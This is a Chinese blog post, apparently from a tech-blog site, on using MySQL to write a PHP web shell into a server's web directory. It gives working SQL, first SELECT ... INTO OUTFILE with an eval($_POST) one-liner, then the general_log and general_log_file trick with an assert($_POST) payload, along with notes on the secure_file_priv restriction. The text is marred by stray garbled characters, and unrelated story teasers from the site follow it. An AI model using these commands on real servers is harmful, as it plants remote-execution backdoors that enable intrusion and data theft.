【MySQL】寫文件到服務(wù)器 web目錄

寫入文件 1 - 簡單的嘗試

select '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'D:/phpStudy/WWW/cmd.php'


可能報錯:
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

在mysql中使用secure_file_priv配置項拾酝,對數(shù)據(jù)導(dǎo)入導(dǎo)出的限制。

導(dǎo)出數(shù)據(jù)表
把mydata.user表的數(shù)據(jù)導(dǎo)出來:
select * from mydata.user INTO OUTFILE '/home/mysql/user.txt';

mysql的官方:

--secure-file-priv=name Limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() to files within specified directory

限制導(dǎo)出導(dǎo)入文件到特定目錄祈惶,其具體用法:

# 限制mysqld的導(dǎo)入和導(dǎo)出,完全禁止出。
mysqld --secure_file_prive=null


# 限制mysqld的導(dǎo)入和導(dǎo)出恒削,只能在特定目錄 /tmp/之下
mysqld --secure_file_priv=/tmp/


# 不限制mysqld的導(dǎo)入和導(dǎo)出
在文件/etc/my.cnf中不寫 --secure_file_priv

寫入文件 2 - 通過general_log和general_log_file

--secure-file-priv

general log簡介:
mysql:打開general log選項,所有的查詢語句都在general log文件中以可讀的方式得到
(這樣general log文件會非常大尾序,所以默認(rèn)是關(guān)閉的钓丰!有的時候為了查錯等原因,會暫時打開general log)

即general_log_file會記錄所有的查詢語句每币,以原始的狀態(tài)來顯示携丁。

寫入原理:
將general_log開關(guān)打開,語句指定general_log_file為1.php文件兰怠,則查詢語句的結(jié)果 全部寫入到general_log_file指定的文件1.php

執(zhí)行語句:

# 查看genera文件配置情況
show global variables like "%genera%";
#查看有讀寫權(quán)限的目錄
show global variables like ‘%secure%’;
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/upload/1.php';
SELECT '<?php assert($_POST["cmd"]);?>';

大部分都好用

有一次實測失敗了:general_log 可寫到目錄home或tmp 但web根目錄寫不了
嘗試寫web目錄的子目錄(比如img. upload)
改了log file路徑之后 general log就神奇般的自動從ON變?yōu)镺FF了
再改回ON,下面的log路徑就自動變回去梦鉴。

# 關(guān)閉general_log
set global general_log=off;
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市揭保,隨后出現(xiàn)的幾起案子肥橙,更是在濱河造成了極大的恐慌,老刑警劉巖掖举,帶你破解...
    沈念sama閱讀 218,682評論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件快骗,死亡現(xiàn)場離奇詭異,居然都是意外死亡塔次,警方通過查閱死者的電腦和手機(jī)方篮,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,277評論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來励负,“玉大人藕溅,你說我怎么就攤上這事〖逃埽” “怎么了巾表?”我有些...
    開封第一講書人閱讀 165,083評論 0 355
  • 文/不壞的土叔 我叫張陵,是天一觀的道長略吨。 經(jīng)常有香客問我集币,道長,這世上最難降的妖魔是什么翠忠? 我笑而不...
    開封第一講書人閱讀 58,763評論 1 295
  • 正文 為了忘掉前任鞠苟,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘当娱。我一直安慰自己吃既,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,785評論 6 392
  • 文/花漫 我一把揭開白布跨细。 她就那樣靜靜地躺著鹦倚,像睡著了一般。 火紅的嫁衣襯著肌膚如雪冀惭。 梳的紋絲不亂的頭發(fā)上震叙,一...
    開封第一講書人閱讀 51,624評論 1 305
  • 那天,我揣著相機(jī)與錄音云头,去河邊找鬼捐友。 笑死,一個胖子當(dāng)著我的面吹牛溃槐,可吹牛的內(nèi)容都是我干的匣砖。 我是一名探鬼主播,決...
    沈念sama閱讀 40,358評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼昏滴,長吁一口氣:“原來是場噩夢啊……” “哼猴鲫!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起谣殊,我...
    開封第一講書人閱讀 39,261評論 0 276
  • 序言:老撾萬榮一對情侶失蹤拂共,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后姻几,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體宜狐,經(jīng)...
    沈念sama閱讀 45,722評論 1 315
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,900評論 3 336
  • 正文 我和宋清朗相戀三年蛇捌,在試婚紗的時候發(fā)現(xiàn)自己被綠了抚恒。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,030評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡络拌,死狀恐怖俭驮,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情春贸,我是刑警寧澤混萝,帶...
    沈念sama閱讀 35,737評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站萍恕,受9級特大地震影響逸嘀,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜允粤,卻給世界環(huán)境...
    茶點故事閱讀 41,360評論 3 330
  • 文/蒙蒙 一厘熟、第九天 我趴在偏房一處隱蔽的房頂上張望屯蹦。 院中可真熱鬧,春花似錦绳姨、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,941評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至购撼,卻和暖如春跪削,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背迂求。 一陣腳步聲響...
    開封第一講書人閱讀 33,057評論 1 270
  • 我被黑心中介騙來泰國打工碾盐, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人揩局。 一個月前我還...
    沈念sama閱讀 48,237評論 3 371
  • 正文 我出身青樓毫玖,卻偏偏與公主長得像,于是被迫代替她去往敵國和親凌盯。 傳聞我的和親對象是個殘疾皇子付枫,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,976評論 2 355

推薦閱讀更多精彩內(nèi)容